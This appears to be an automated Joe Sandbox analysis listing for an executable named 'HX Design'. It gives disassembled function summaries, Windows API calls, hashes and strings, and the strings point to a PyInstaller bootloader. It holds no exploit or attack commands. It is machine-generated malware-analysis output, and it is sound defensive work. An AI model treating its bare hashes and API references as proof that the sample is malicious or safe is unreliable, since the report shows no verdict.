                                                                                                                                                                                                                                                      • Instruction ID: 0f3360b149681b7e4b9c729e51ed2cd11bf70a3dffbc8e03530394cc07474e5d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA51E526604BA187D624AF26A4181BAB7A1F798B61F404131EBDE83695DF7CD089DB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                      • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                      • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                      • Instruction ID: 8db2052b94fb66c2b72206f813024814f6b29c41213e9b733babec58ceb836df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C21EC21B09A4292E7416B79F894179A250FF88B90FD84230DE2D873E5DE6CD54CD324
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                      • Instruction ID: 0cd1ac7d8c32175691ddce0a0ce6c4ed9b91edcd19bf4850116295a5c3236c0a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD127061E0C283A6FB647A1CD1542BEF6A1FB50750FC44135E69B46AC4DFBCE588EB20
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                      • Instruction ID: ed78076f31f6aa2f294318ef55ec83903aa10f24e5db58e15f2d0d3763611756
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9129661E0C243A6FB247E18E054679F6A1FB80F54FD44035E69A47AC4DFBCE588EB60
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                      • Opcode ID: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                                                      • Instruction ID: 214ca093491f94df52bd7333b87fe98486aa82ea463230b33745e3f7626d85cc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d3663ac886a74f27bf0299a60bdb2a17e78e9504a320c07c927e36cc87db77
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A41A221B08652A6EA10FB15E8046BAE391FF44FC4FC44432ED8C4B796DEBCE509E764
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                      • Opcode ID: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                                                      • Instruction ID: 03f748e23ab184c15441e64723ba966020395d3cb8ef41e5b78a5ffe30c64f04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba66df6895bd2fe50a7fbf599ddcec943e173133a1bf7a4519d7db8308d256bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10418121B08643A6EB10FB21D4405BAE390FF44B94FC44532ED9D47B96DEBCE519E728
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                      • Instruction ID: 4fd0aca0971c72fa425bf99d301925014f6c8d49d116108ba1f4bead5319999a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44D1D332B08B429AEB20EF65D4407ADB7A0FB44788F900135EE4D57B96CF78E099D794
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF732062D99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                      • Instruction ID: 45ceae76b9c750aa1d07ccff3a12140a5f95895c8197e93fc1470a1ba7bb68be
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731D822708B4166E620BB25A8142BBA691FF88798F810136EF4D93759EF7CD54AD710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD4D
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD5B
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD85
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDF3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDFF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                      • Instruction ID: 0e0bd18d68acd259c9afd2594edc42d964b6ad71fa5ace60548169a8753dc1e1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931D621B1A642A1EE11BB06A4006B5A3D4FF49BA4FD94535DD3E5B390DFBCE448D328
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                      • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                      • Instruction ID: 967bf6b8a112f732990a34582b8cf334438acd789e15bc2b29f74f267c1dd47d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7416021B19A86B1EA25FB20E4542EEA361FF44344FC00132EA5D43699EFBCE51DD764
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF73206351A,?,00000000,00007FF732063F23), ref: 00007FF732062AA0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                      • Instruction ID: 6f41bccdc65c8b3659487b17931ac05f67b1741db81dcd0c9ea571957cf4e40e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321A332719781A2E720AB55F8407E6A394FB88784F800132FE8C83759DFBCD149D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                      • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                      • Instruction ID: be417e27483c94adb8c49ff48fcef4bc5467617b84a97c80b7a7359d73fb7d4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B219F30F0D242A1FA5873299A5513AD2425F447B0FD44734D93E47BD6DEACB849E760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                      • Instruction ID: a6552da9b8e83610aa44058c33b145efd1b1d8ab4fd2ce3cfe5d778f4bc21481
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F118431618A4196E750AB52E85432AE2A0FB88FE4F940234D96D877A4DFBCD818C750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068EFD
                                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068F5A
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9
                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068FE5
                                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069044
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069055
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF73206906A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                                      • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                      • Instruction ID: b0f7528cda2152583152ab0b82cf054dacf1a85aacce76245cca4c27958c7200
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341D762B19686A5FA30BB11A5402BAF394FF84BC4F840135DF8D57B89DEBCE508D724
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B2D7
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B30D
                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B33A
